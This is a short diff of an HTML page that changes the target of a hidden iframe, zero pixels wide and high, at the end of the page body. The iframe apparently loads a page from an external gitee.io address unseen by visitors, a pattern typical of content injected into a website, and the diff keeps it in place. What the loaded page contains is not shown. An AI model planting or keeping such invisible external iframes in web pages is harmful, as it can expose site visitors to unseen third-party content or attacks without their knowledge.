--- a/9.html
+++ b/9.html
@@ -153,7 +153,7 @@ return(false);
    
     
     
-   <iframe src="https://ktv98.gitee.io./0gg.html" width="0" height="0"></iframe></body>
+   <iframe src="https://ktv98.gitee.io./gg.html" width="0" height="0"></iframe></body>
 
    </body>
 <html>
